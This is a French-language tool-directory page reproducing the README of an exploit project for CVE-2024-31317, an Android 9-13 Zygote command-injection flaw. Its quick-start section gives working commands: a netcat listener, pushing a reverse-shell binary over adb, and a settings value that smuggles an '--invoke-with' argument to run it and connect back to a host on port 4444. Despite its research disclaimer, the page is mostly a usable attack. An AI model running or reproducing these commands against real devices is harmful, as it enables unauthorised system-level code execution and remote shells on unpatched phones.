Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-31317-Deployer — CVE-2024-31317 Outil de recherche et de déploiement de la vulnérabilité d'injection de commande Zygote Android | Cadre d'exploitation de vulnérabilités Android 9-13 | Kitploit
Outils/GitHubGitHub/fcy10012/cve-2024-31317-deployer
Sécurité AndroidAnalyse des VulnérabilitésExploitationCommandement et ContrôleApprentissage et ÉducationDéveloppement de Charges UtilesExploitation de Binaires
GitHubfcy10012/cve-2024-31317-deployer

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-31317-Deployer

CVE-2024-31317 Outil de recherche et de déploiement de la vulnérabilité d'injection de commande Zygote Android | Cadre d'exploitation de vulnérabilités Android 9-13

Voir le dépôt
622il y a 8 moisPas encore vérifié

CVE-2024-31317 Deployer

License Android Status

🔒 Déclaration sur la recherche en sécurité

Ce projet est destiné uniquement à des fins de recherche en sécurité et d'éducation. L'utilisation de cet outil pour des tests non autorisés est illégale. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés.

📋 Aperçu

CVE-2024-31317 est une faille de sécurité critique affectant les appareils Android 9 à Android 13, permettant à une application disposant de l'autorisation WRITE_SECURE_SETTINGS d'obtenir une exécution au niveau système via une injection de commandes.

Ce projet fournit une analyse technique détaillée de la vulnérabilité, un code de preuve de concept et des outils de déploiement automatisés.

✨ Principales caractéristiques

  • 📱 Prise en charge de toutes les versions Android 9-13
  • 🛠️ Script de déploiement automatisé
  • 🔄 Connexion inverse Shell
  • 📊 Documentation technique détaillée
  • 🎯 Conception modulaire

🐛 Détails de la vulnérabilité

  • ID CVE : CVE-2024-31317
  • Type de vulnérabilité : Injection de commandes
  • Niveau de gravité : Élevé
  • Score CVSS : 7.8
  • Composant affecté : Processus Zygote d'Android
  • État du correctif : Corrigé dans le correctif de sécurité Android de juin 2024

🎯 Périmètre d'impact

Versions affectées

  • ✅ Android 9-13

Versions non affectées

  • ❌ Android 14+ (corrigé)
  • ❌ Appareils ayant installé le correctif de sécurité de juin 2024 ou ultérieur

📁 Structure du projet

root@kitploit:~
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/

🚀 Démarrage rapide

1. Cloner le projet

root@kitploit:~
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer

2. Compiler la charge utile

root@kitploit:~
chmod +x compile.sh
./compile.sh

3. Déploiement

root@kitploit:~
# Démarrer l'écouteur
nc -lvnp 4444

# Pousser et exécuter
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell

# Injecter la charge utile
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"

# Déclencher la vulnérabilité
adb shell stop && adb shell start

📚 Documentation

  • Analyse technique approfondie
  • Instructions d'utilisation de la charge utile
  • Tutoriel complet d'utilisation

⚠️ Avis de non-responsabilité

Ce projet est destiné uniquement à des fins de recherche en sécurité et d'éducation. En utilisant cet outil, vous acceptez :

  • de respecter toutes les lois et réglementations applicables
  • de l'utiliser uniquement pour des recherches de sécurité légitimes
  • d'assumer l'entière responsabilité de vos actions

📜 Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails

👨‍💻 Auteur

fcy10012 - GitHub

🙏 Remerciements

Projet de référence : WebLDix/CVE-2024-31317-PoC-Deployer


⭐ Si ce projet vous est utile, veuillez lui attribuer une étoile !

Télécharger l’outil